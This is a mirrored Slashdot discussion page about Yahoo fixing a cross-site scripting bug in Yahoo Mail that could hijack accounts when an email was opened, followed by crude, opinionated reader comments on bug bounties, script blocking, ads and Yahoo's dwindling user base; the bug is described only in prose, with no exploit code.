Slashdot Mirror
Yahoo Fixes Bug That Could Compromise Email Accounts When Opening an Email (klikki.fi)
An anonymous reader writes: Yahoo! has fixed a cross-site scripting bug that would have allowed attackers to fully compromise email accounts just by sending a malicious email. To lose control over their accounts, victims needed only to open the email. The researcher who discovered the bug said, "The code would be automatically evaluated when the message was viewed. ... We provided Yahoo with a proof of concept email that would forward the victim user's inbox to an external website, and an email virus which infects the Yahoo Mail account and attaches itself to all outgoing emails. The bug was fixed before any known exploits 'in the wild.'" Yahoo!'s bounty program awarded $10,000 for the research.
Because not all of the skilled and talented people out there are asshats willing to sell out security to make a quick buck?
The number of people affected were 5 of the 11 people who still use Yahoo! mail.
This fix will make it harder to get my hot ex-gf's nudie pics.
For yahoo mail? really?
Why would blackhats buy an exploit for an email provider with a userbase of 3?
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
I have one because of my ISP. I know people who have had their Yahoo address so long they keep it out of sheer inertia.
To me this comes down to the fundamental problem: why the hell do we keep trusting websites to run arbitrary scripts? And why the hell do we trust 3rd party scripts in web pages?
So some greedy bastard can give you an ad?
The average Yahoo user likely doesn't use script blockers, and isn't going to start out blocking them only to whitelist what they want.
I can barely convince my wife to keep using the script blocker I've put into her Chrome to block all this shit.
At this point, the entire web has been written on the moronic assumption that people should just let everything run, which leads to stuff like this.
What we need to do is look at this stuff, and remove the default trust ... and what the ad and analytics companies want be damned. They're as much part of the problem as anything, and as often as not they end up serving up the malware in the first place.
Yes, Yahoo has some stuff they need to fix ... but I don't see this as being any more vulnerable than what your average web page expects you to do.
Lost at C:>. Found at C.
More than you'd suspect. AT&T was using Yahoo to provide email services for their DSL customers.
I have one because of my ISP. I know people who have had their Yahoo address so long they keep it out of sheer inertia.
To me this comes down to the fundamental problem: why the hell do we keep trusting websites to run arbitrary scripts?
Because it's a free service, you cheap bastard.
And why the hell do we trust 3rd party scripts in web pages? So some greedy bastard can give you an ad?
Yes, because that "greedy" provider on the other end has to have some ability to pay for the service they're giving away for free to cheap bastards like yourself.
The average Yahoo user likely doesn't use script blockers, and isn't going to start out blocking them only to whitelist what they want.
I can barely convince my wife to keep using the script blocker I've put into her Chrome to block all this shit.
That's OK, I can barely convince people that the concept you get what you pay for is still a valid one, you cheap bastard.
At this point, the entire web has been written on the moronic assumption that people should just let everything run, which leads to stuff like this.
At this point, no one on the internet thinks that online services like email should be anything but free, leading to a moronic web built by and for cheap bastards.
What we need to do is look at this stuff, and remove the default trust ... and what the ad and analytics companies want be damned. They're as much part of the problem as anything, and as often as not they end up serving up the malware in the first place.
Yes, Yahoo has some stuff they need to fix ... but I don't see this as being any more vulnerable than what your average web page expects you to do.
What we need to do is look at society and start understanding that "free" has some significant cost to it for all of us. Unfortunately, it's not likely to do much good. I didn't expect the world to be so full of cheap bastards...
This has been said a million times before but...
Why on Earth is an email reader running any code that happens to be in an email message?
The bug is that the email reader does not just display the raw ASCII text of the message.
I bet they have not fixed that.
$10,000 is 50 man hours - roughly. So, unless it took less than that to discover the bug, then it's not economically viable with US workers.
And when you consider the potential economic damage that could be caused to Yahoo! if this bug were exploited by people with nefarious intent, $10,000 is downright pathetic.
Whatever, I'm sure everyone will disagree with me because techies have the money sense of a teenager.
Ha! Corporations love the free market until they don't! Must be nice to get all the benefits of being a person under the law without all those messy morals and conscience.
I stopped using Yahoo webmail when I found out that XSS would allow your account to be hijacked if you were merely logged in while viewing a site that included a malicious script.
Thanks, Marissa!
Ads are how we've decided that web-based services are paid for, given the lack of convenient and efficient micro-payments. However, you don't need scripts to have ads. Static images or even text work just fine. Hell, ads printed in ink on paper have paid for newspapers for a hundred years or more. So to whatever extent ads are needed to pay for "free" web sites, that does NOT imply that third-party scripts are required.
Adblocker Plus has an option to allow unobtrusive ads. This is the right balance. I will use your free service and accept the ads you serve up that don't compromise my security with shifty javascript, and that don't behave obnoxiously in order to forcibly tear my attention away from what I care about.
I am not a cheap bastard for wanting the ads that pay for my services to be safe and unobtrusive. Of course, I am not the OP either.
for reals.
I got a Yahoo email when they first came out, before Gmail was a thing. It makes a great honeypot email address for websites that need a legit email to work (FYI - My corresponding name is John Doe and I live at 123 Fuckoff St., Anywhere, Zimbabwe). I sure as hell don't bother logging in to open or read anything in there - I'm sure there is crap in there that would make Goatse look suitable for the cover of a mother's day card. When (not if) Yahoo finally gasps its last and dies, I'll be sad for the whole two seconds it takes to set up a new throw away account.
Left MS Windows for Linux Mint and never looked back!
Vote for Bernie in 2016!
I take it you have to run a script in the email while reading it with the Yahoo web client open, so using a local client is safe. (I don't open mail from people I don't know anyway... and even then, scripts and images are disabled in my client.)
I was able to get myfirstname.mylastname@yahoo.com, so not only do I still use it, but I pay $20 annually for IMAP/SMTP access. I use Thunderbird or iOS Mail to read my mail and only rarely and occasionally use the web client to read mail.
However, their stupid security settings require that I sign into the web client every two weeks to re-enable IMAP.
I can see the fnords!
They still are; my ancient @bellsouth.net email address was migrated to the att.yahoo.com interface a few years ago.
Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
... assuming only the yahoo domains were allowed?
Ditto for my Ameritech dot net email.
Like everyone everywhere is able to pay recurring fees for every little thing, yearly or monthly for decades on.
If you could get something like a lifetime subscription for mail at $100 I guess many would sign up (includes a choice of webmail like roundcube, squirrel etc.)
Perhaps $50, perhaps long term (20 years or delete after 5 years you didn't log in)
We're not only not willing to pay. Once you're paying for email, you have to keep paying (and have a valid debit card or banking account, etc.).
You may pay for a domain name, perhaps have some redirection trickery going on so conceivably it would be no big deal to lose that email service. But then, here's your domain recurring fee and renewal. It feels like hackers and tech companies have trouble renewing their domain (perhaps the rule of domains is if you get a domain, then you forget about it till the last minutes). So imagine your grandma paying recurring fees she doesn't know how to cancel, AND she lost her domain.
I'll even pay for an email service that doesn't support html and discards pictures, if you let me pay once and only once.
Yahoo, a multi-million, possibly billion dollar company can't secure their own goddamn webmail, and this is after having ~20 years of experience in being an email provider.
Fucking fabulous, great job guys, you da man.
Just cruising through this digital world at 33 1/3 rpm...
To lose control over their accounts, victims needed only to open the email. The researcher who discovered the bug said, "The code would be automatically evaluated when the message was viewed. ...
Hmmm, I thought this kind of crap only happened with Outlook.